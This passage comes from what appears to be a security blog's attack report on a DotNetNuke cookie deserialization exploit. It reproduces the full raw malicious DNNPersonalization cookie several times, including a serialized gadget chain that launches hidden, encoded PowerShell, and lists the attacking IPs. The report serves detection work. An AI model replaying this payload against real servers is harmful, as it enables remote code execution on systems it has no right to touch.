UUFRUUJCQUdZQVVRQkNBRGNBUVFCRUFFVUFRUUJtQUZFQVFRQnBBRUVBUXdBd0FFRUFXZ0JuQUVFQWJnQkJBRU1BT0FCQkFFd0Fkd0JDQURNQVFRQklBR01BUVFCa0FIY0FRUUIxQUVFQVF3QmpBRUVBVEFCQkFFRUFiZ0JCQUVjQVZRQkJBRW9BZHdCQkFIQUFRUUJEQUhjQVFRQkxBRUVBUVFCcEFFRUFTQUJ6QUVFQVRRQkJBRUlBT1FCQkFFZ0Fjd0JCQUUwQVVRQkNBRGtBUVFCREFFa0FRUUJNQUZFQVFnQnRBRUVBUXdCQkFFRUFTZ0IzQUVFQWRRQkJBRWdBWXdCQkFHRUFVUUJDQUhVQVFRQkRBRGdBUVFCakFIY0FRZ0JxQUVFQVF3QmpBRUVBVEFCQkFFRUFiZ0JCQUVnQVdRQkJBRXdBWndCQkFHNEFRUUJEQUdzQVFRQkxBRkVBUVFCd0FFRUFTQUIzQUVFQVRBQm5BRUVBYndCQkFFTUFTUUJCQUdVQWR3QkJBSGdBUVFCSUFEQUFRUUJsQUhjQVFRQjNBRUVBU0FBd0FFRUFTUUJuQUVFQWRBQkJBRWNBV1FCQkFFb0Fkd0JDQUd3QVFRQklBR2NBUVFCS0FIY0FRUUJ6QUVFQVF3QmpBRUVBWVFCUkFFRUFiZ0JCQUVNQWF3QkJBQ2NBT3dBZ0FITUFkQUJoQUhJQWRBQWdBRU1BT2dCY0FGY0FhUUJ1QUdRQWJ3QjNBSE1BWEFCVEFIa0Fjd0IwQUdVQWJRQXpBRElBWEFCWEFHa0FiZ0JrQUc4QWR3QnpBRkFBYndCM0FHVUFjZ0JUQUdnQVpRQnNBR3dBWEFCMkFERUFMZ0F3QUZ3QWNBQnZBSGNBWlFCeUFITUFhQUJsQUd3QWJBQXVBR1VBZUFCbEFDQUFMUUJYQUdrQWJnQmtBRzhBZHdCVEFIUUFlUUJzQUdVQUlBQklBR2tBWkFCa0FHVUFiZ0FnQUNjQUxRQmxBRzRBWXdCdkFHUUFaUUFuQUN3QUlBQWtBR1VBSUFBZ0FDQUEGBwAAABtDOlxXaW5kb3dzXFN5c3RlbTMyXGNtZC5leGUEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw==<\/anyType> <\/MethodParameters> <\/ProjectedProperty0> <\/ExpandedWrapperOfObjectStateFormatterObjectDataProvider><\/item><\/profile>;<\/pre>\n
 <\/p>\n
Request Headers:<\/strong><\/h3>\n
{\"Cookie\":\"DNNPersonalization=<profile><item key=\\\"key\\\" type=\\\"System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\\"><ExpandedWrapperOfObjectStateFormatterObjectDataProvider> <ProjectedProperty0> <ObjectInstance p3:type=\\\"ObjectStateFormatter\\\" xmlns:p3=\\\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\\\" \/> <MethodName>Deserialize<\/MethodName> <MethodParameters> <anyType xmlns:q1=\\\"http:\/\/www.w3.org\/2001\/XMLSchema\\\" p5:type=\\\"q1:string\\\" xmlns:p5=\\\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\\\">\/wEy8ykAAQAAAP\/\/\/\/8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAAoRgvYyBDOlxXaW5kb3dzXFN5c3RlbTMyXFdpbmRvd3NQb3dlclNoZWxsXHYxLjBccG93ZXJzaGVsbC5leGUgLVdpbmRvd1N0eWxlIEhpZGRlbiAtZW5jb2RlIEpBQmxBRDBBSndCTEFFRUFRUUJ0QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVrQVFRQm1BRkVBUWdBM0FFRUFSQUJCQUVFQVpnQlJBRUVBYVFCQkFFTUFNQUJCQUZvQVp3QkJBR2NBUVFCREFHTUFRUUJhQUZFQVFnQnFBRUVBU0FCUkFFRUFTZ0IzQUVFQWN3QkJBRU1BWXdCQkFGUUFad0JDQUd3QVFRQklBR01BUVFCS0FIY0FRUUJ6QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVFQVFRQm1BRkVBUVFCcEFFRUFRd0JCQUVFQVRBQlJBRUlBYlFCQkFFTUFZd0JCQUdFQVp3QkJBRzRBUVFCREFIY0FRUUJLQUhjQVFRQjBBRUVBUlFBNEFFRUFXUUJuQUVFQWJnQkJBRU1BYXdCQkFFc0FVUUJCQUdjQVFRQkRBR2NBUVFCSkFHY0FRZ0EzQUVFQVJBQkZBRUVBWmdCUkFFSUFOd0JCQUVRQVNRQkJBR1lBVVFCQ0FEY0FRUUJFQUUwQVFRQm1BRkVBUWdBM0FFRUFSQUJSQUVFQVpnQlJBRUlBTndCQkFFUUFRUUJCQUdZQVVRQkJBR2tBUVFCREFEQUFRUUJhQUdjQVFRQm5BRUVBUXdCakFFRUFZZ0JuQUVJQU1BQkJBRU1BWXdCQkFFd0FRUUJCQUc0QVFRQkdBRTBBUVFCS0FIY0FRUUJ6QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVFQVFRQm1BRkVBUVFCcEFFRUFRd0JCQUVFQVRBQlJBRUlBYlFCQkFFTUFZd0JCQUdRQVFRQkNBR3dBUVFCREFHTUFRUUJNQUVFQVFRQnVBRUVBU0FCckFFRUFZd0IzQUVFQWJnQkJBRU1BYXdCQkFFd0FRUUJCQUc4QVFRQkRBRWtBUVFCbEFIY0FRUUIzQUVFQVNBQXdBRUVBWlFCM0FFRUFlUUJCQUVnQU1BQkJBR1VBZHdCQkFIZ0FRUUJJQURBQVFRQkpBR2NBUVFCMEFFRUFSd0JaQUVFQVNnQjNBRUlBZEFCQkFFTUFZd0JCQUV3QVFRQkJBRzRBUVFCSEFGVUFRUUJaQUdjQVFnQkVBRUVBUndCM0FFRUFZUUJSQUVFQWJnQkJBRU1BZHdCQkFFb0Fkd0JCQUhVQVFRQkZBRFFBUVFCYUFGRUFRZ0F3QUVFQVF3QTBBRUVBVmdCM0FFRUFiZ0JCQUVNQWF3QkJBRXdBUVFCQkFHNEFRUUJIQUZVQVFRQktBSGNBUVFCd0FFRUFRd0JyQUVFQVRBQm5BRUVBYndCQkFFTUFTUUJCQUdVQWR3QkJBSGdBUVFCSUFEQUFRUUJsQUhjQVFRQjZBRUVBU0FBd0FFRUFaUUIzQUVFQWVRQkJBRWdBTUFCQkFHVUFkd0JCQUhjQVFRQklBREFBUVFCSkFHY0FRUUJuQUVFQVF3QXdBRUVBV2dCbkFFRUFad0JCQUVNQVp3QkJBRWtBWndCQ0FEY0FRUUJFQUVVQVFRQm1BRkVBUWdBM0FFRUFSQUJCQUVFQVpnQlJBRUlBTndCQkFFUUFTUUJCQUdZQVVRQkJBR2tBUVFCREFFRUFRUUJNQUZFQVFnQnRBRUVBUXdCakFFRUFaQUJCQUVJQWVRQkJBRWNBYXdCQkFFb0Fkd0JCQUhNQVFRQkRBR01BUVFCWkFGRUFRZ0JyQUVFQVJnQk5BRUVBU2dCM0FFRUFjd0JCQUVNQVl3QkJBR0lBWndCQ0FHNEFRUUJEQUdNQVFRQkxBRkVBUVFCekFFRUFRd0JqQUVFQVVnQkJBRUVBYmdCQkFFTUFkd0JCQUVzQVFRQkJBR2tBUVFCSUFITUFRUUJOQUZFQVFnQTVBRUVBU0FCekFFRUFUUUJCQUVJQU9RQkJBRU1BU1FCQkFFa0FRUUJCQUhRQVFRQkhBRmtBUVFCS0FIY0FRZ0IxQUVFQVJ3QjNBRUVBWWdCM0FFRUFiZ0JCQUVNQWR3QkJBRW9BZHdCQ0FETUFRUUJEQUdNQVFRQkxBRkVBUVFCekFFRUFRd0JqQUVFQVlnQjNBRUVBYmdCQkFFTUFhd0JCQUV3QVp3QkJBR2tBUVFCSEFHc0FRUUJaQUVFQVFnQlBBRUVBUmdCWkFFRUFWQUIzQUVJQVp3QkJBRVVBY3dCQkFGb0FVUUJCQUdrQVFRQkRBR2NBUVFCTEFFRUFRUUJwQUVFQVNBQnpBRUVBVFFCQkFFSUFPUUJCQUVnQWN3QkJBRTRBUVFCQ0FEa0FRUUJJQUhNQVFRQk5BSGNBUWdBNUFFRUFTQUJ6QUVFQVRRQm5BRUlBT1FCQkFFZ0Fjd0JCQUU0QVVRQkNBRGtBUVFCSUFITUFRUUJOQUZFQVFnQTVBRUVBUXdCSkFFRUFUQUJSQUVJQWJRQkJBRU1BUVFCQkFFc0FRUUJCQUdrQVFRQklBSE1BUVFCTkFFRUFRZ0E1QUVFQVNBQnpBRUVBVFFCUkFFSUFPUUJCQUVNQVNRQkJBRWtBUVFCQkFIUUFRUUJIQUZrQVFRQktBSGNBUWdCdkFFRUFTQUJSQUVFQVpBQkJBRUVBYmdCQkFFTUFkd0JCQUVvQWR3QkNBSGNBUVFCRUFHOEFRUUJLQUhjQVFRQndBRUVBUXdCM0FFRUFTZ0IzQUVJQWR3QkJBRWdBVFFCQkFFMEFVUUJCQUc0QVFRQkRBSGNBUVFCS0FIY0FRUUF6QUVFQVJ3QnZBRUVBU2dCM0FFRUFjd0JCQUVNQVl3QkJBRm9BVVFCQ0FIUUFRUUJIQUZVQVFRQktBSGNBUVFCekFFRUFRd0JuQUVFQVNRQm5BRUlBTndCQkFFUUFRUUJCQUdZQVVRQkNBRGNBUVFCRUFFVUFRUUJtQUZFQVFRQnBBRUVBUXdBd0FFRUFXZ0JuQUVFQWJnQkJBRU1BT0FCQkFFd0Fkd0JDQURNQVFRQklBR01BUVFCa0FIY0FRUUIxQUVFQVF3QmpBRUVBVEFCQkFFRUFiZ0JCQUVjQVZRQkJBRW9BZHdCQkFIQUFRUUJEQUhjQVFRQkxBRUVBUVFCcEFFRUFTQUJ6QUVFQVRRQkJBRUlBT1FCQkFFZ0Fjd0JCQUUwQVVRQkNBRGtBUVFCREFFa0FRUUJNQUZFQVFnQnRBRUVBUXdCQkFFRUFTZ0IzQUVFQWRRQkJBRWdBWXdCQkFHRUFVUUJDQUhVQVFRQkRBRGdBUVFCakFIY0FRZ0JxQUVFQVF3QmpBRUVBVEFCQkFFRUFiZ0JCQUVnQVdRQkJBRXdBWndCQkFHNEFRUUJEQUdzQVFRQkxBRkVBUVFCd0FFRUFTQUIzQUVFQVRBQm5BRUVBYndCQkFFTUFTUUJCQUdVQWR3QkJBSGdBUVFCSUFEQUFRUUJsQUhjQVFRQjNBRUVBU0FBd0FFRUFTUUJuQUVFQWRBQkJBRWNBV1FCQkFFb0Fkd0JDQUd3QVFRQklBR2NBUVFCS0FIY0FRUUJ6QUVFQVF3QmpBRUVBWVFCUkFFRUFiZ0JCQUVNQWF3QkJBQ2NBT3dBZ0FITUFkQUJoQUhJQWRBQWdBRU1BT2dCY0FGY0FhUUJ1QUdRQWJ3QjNBSE1BWEFCVEFIa0Fjd0IwQUdVQWJRQXpBRElBWEFCWEFHa0FiZ0JrQUc4QWR3QnpBRkFBYndCM0FHVUFjZ0JUQUdnQVpRQnNBR3dBWEFCMkFERUFMZ0F3QUZ3QWNBQnZBSGNBWlFCeUFITUFhQUJsQUd3QWJBQXVBR1VBZUFCbEFDQUFMUUJYQUdrQWJnQmtBRzhBZHdCVEFIUUFlUUJzQUdVQUlBQklBR2tBWkFCa0FHVUFiZ0FnQUNjQUxRQmxBRzRBWXdCdkFHUUFaUUFuQUN3QUlBQWtBR1VBSUFBZ0FDQUEGBwAAABtDOlxXaW5kb3dzXFN5c3RlbTMyXGNtZC5leGUEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw==<\/anyType> <\/MethodParameters> <\/ProjectedProperty0> <\/ExpandedWrapperOfObjectStateFormatterObjectDataProvider><\/item><\/profile>;\"<\/pre>\n
 <\/p>\n
Second, we decode the encoded message again, and then we find the following pattern is in the message. C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -WindowStyle Hidden \u2013encode<\/span><\/p>\n
This exploit tries to compromise Windows systems and calls powershell.exe to execute arbitrary codes. Further, the exploit can’t be detected by the majority of defending systems, at the time of writing.<\/p>\n
 <\/p>\n","protected":false},"excerpt":{"rendered":"
Date of Detection: 2017.12.11   Source IP Addresses: 173.212.217.181\u3001149.255.35.91   Attack Raw Pattern: DNNPersonalization=<profile><item key=\\”key\\” type=\\”System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\”><ExpandedWrapperOfObjectStateFormatterObjectDataProvider> <ProjectedProperty0> <ObjectInstance p3:type=\\”ObjectStateFormatter\\” xmlns:p3=\\”http:\/\/www.w3.org\/2001\/XMLSchema-instance\\” \/> <MethodName>Deserialize<\/MethodName> <MethodParameters> <anyType xmlns:q1=\\”http:\/\/www.w3.org\/2001\/XMLSchema\\” p5:type=\\”q1:string\\” xmlns:p5=\\”http:\/\/www.w3.org\/2001\/XMLSchema-instance\\”>\/wEy8ykAAQAAAP\/\/\/\/8BAAAAAAAAAAwCAAAASVN5c3RlbSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAAIQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuU29ydGVkU2V0YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAVDb3VudAhDb21wYXJlcgdWZXJzaW9uBUl0ZW1zAAMABgiNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQgCAAAAAgAAAAkDAAAAAgAAAAkEAAAABAMAAACNAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkNvbXBhcmlzb25Db21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQEAAAALX2NvbXBhcmlzb24DIlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIJBQAAABEEAAAAAgAAAAYGAAAAoRgvYyBDOlxXaW5kb3dzXFN5c3RlbTMyXFdpbmRvd3NQb3dlclNoZWxsXHYxLjBccG93ZXJzaGVsbC5leGUgLVdpbmRvd1N0eWxlIEhpZGRlbiAtZW5jb2RlIEpBQmxBRDBBSndCTEFFRUFRUUJ0QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVrQVFRQm1BRkVBUWdBM0FFRUFSQUJCQUVFQVpnQlJBRUVBYVFCQkFFTUFNQUJCQUZvQVp3QkJBR2NBUVFCREFHTUFRUUJhQUZFQVFnQnFBRUVBU0FCUkFFRUFTZ0IzQUVFQWN3QkJBRU1BWXdCQkFGUUFad0JDQUd3QVFRQklBR01BUVFCS0FIY0FRUUJ6QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVFQVFRQm1BRkVBUVFCcEFFRUFRd0JCQUVFQVRBQlJBRUlBYlFCQkFFTUFZd0JCQUdFQVp3QkJBRzRBUVFCREFIY0FRUUJLQUhjQVFRQjBBRUVBUlFBNEFFRUFXUUJuQUVFQWJnQkJBRU1BYXdCQkFFc0FVUUJCQUdjQVFRQkRBR2NBUVFCSkFHY0FRZ0EzQUVFQVJBQkZBRUVBWmdCUkFFSUFOd0JCQUVRQVNRQkJBR1lBVVFCQ0FEY0FRUUJFQUUwQVFRQm1BRkVBUWdBM0FFRUFSQUJSQUVFQVpnQlJBRUlBTndCQkFFUUFRUUJCQUdZQVVRQkJBR2tBUVFCREFEQUFRUUJhQUdjQVFRQm5BRUVBUXdCakFFRUFZZ0JuQUVJQU1BQkJBRU1BWXdCQkFFd0FRUUJCQUc0QVFRQkdBRTBBUVFCS0FIY0FRUUJ6QUVFQVF3Qm5BRUVBU1FCbkFFSUFOd0JCQUVRQVJRQkJBR1lBVVFCQ0FEY0FRUUJFQUVFQVFRQm1BRkVBUVFCcEFFRUFRd0JCQUVFQVRBQlJBRUlBYlFCQkFFTUFZd0JCQUdRQVFRQkNBR3dBUVFCREFHTUFRUUJNQUVFQVFRQnVBRUVBU0FCckFFRUFZd0IzQUVFQWJnQkJBRU1BYXdCQkFFd0FRUUJCQUc4QVFRQkRBRWtBUVFCbEFIY0FRUUIzQUVFQVNBQXdBRUVBWlFCM0FFRUFlUUJCQUVnQU1BQkJBR1VBZHdCQkFIZ0FRUUJJQURBQVFRQkpBR2NBUVFCMEFFRUFSd0JaQUVFQVNnQjNBRUlBZEFCQkFFTUFZd0JCQUV3QVFRQkJBRzRBUVFCSEFGVUFRUUJaQUdjQVFnQkVBRUVBUndCM0FFRUFZUUJSQUVFQWJnQkJBRU1BZHdCQkFFb0Fkd0JCQUhVQVFRQkZBRFFBUVFCYUFGRUFRZ0F3QUVFQVF3QTBBRUVBVmdCM0FFRUFiZ0JCQUVNQWF3QkJBRXdBUVFCQkFHNEFRUUJIQUZVQVFRQktBSGNBUVFCd0FFRUFRd0JyQUVFQVRBQm5BRUVBYndCQkFFTUFTUUJCQUdVQWR3QkJBSGdBUVFCSUFEQUFRUUJsQUhjQVFRQjZBRUVBU0FBd0FFRUFaUUIzQUVFQWVRQkJBRWdBTUFCQkFHVUFkd0JCQUhjQVFRQklBREFBUVFCSkFHY0FRUUJuQUVFQVF3QXdBRUVBV2dCbkFFRUFad0JCQUVNQVp3QkJBRWtBWndCQ0FEY0FRUUJFQUVVQVFRQm1BRkVBUWdBM0FFRUFSQUJCQUVFQVpnQlJBRUlBTndCQkFFUUFTUUJCQUdZQVVRQkJBR2tBUVFCREFFRUFRUUJNQUZFQVFnQnRBRUVBUXdCakFFRUFaQUJCQUVJQWVRQkJBRWNBYXdCQkFFb0Fkd0JCQUhNQVFRQkRBR01BUVFCWkFGRUFRZ0JyQUVFQVJnQk5BRUVBU2dCM0FFRUFjd0JCQUVNQVl3QkJBR0lBWndCQ0FHNEFRUUJEQUdNQVFRQkxBRkVBUVFCekFFRUFRd0JqQUVFQVVnQkJBRUVBYmdCQkFFTUFkd0JCQUVzQVFRQkJBR2tBUVFCSUFITUFRUUJOQUZFQVFnQTVBRUVBU0FCekFFRUFUUUJCQUVJQU9RQkJBRU1BU1FCQkFFa0FRUUJCQUhRQVFRQkhBRmtBUVFCS0FIY0FRZ0IxQUVFQVJ3QjNBRUVBWWdCM0FFRUFiZ0JCQUVNQWR3QkJBRW9BZHdCQ0FETUFRUUJEQUdNQVFRQkxBRkVBUVFCekFFRUFRd0JqQUVFQVlnQjNBRUVBYmdCQkFFTUFhd0JCQUV3QVp3QkJBR2tBUVFCSEFHc0FRUUJaQUVFQVFnQlBBRUVBUmdCWkFFRUFWQUIzQUVJQVp3QkJBRVVBY3dCQkFGb0FVUUJCQUdrQVFRQkRBR2NBUVFCTEFFRUFRUUJwQUVFQVNBQnpBRUVBVFFCQkF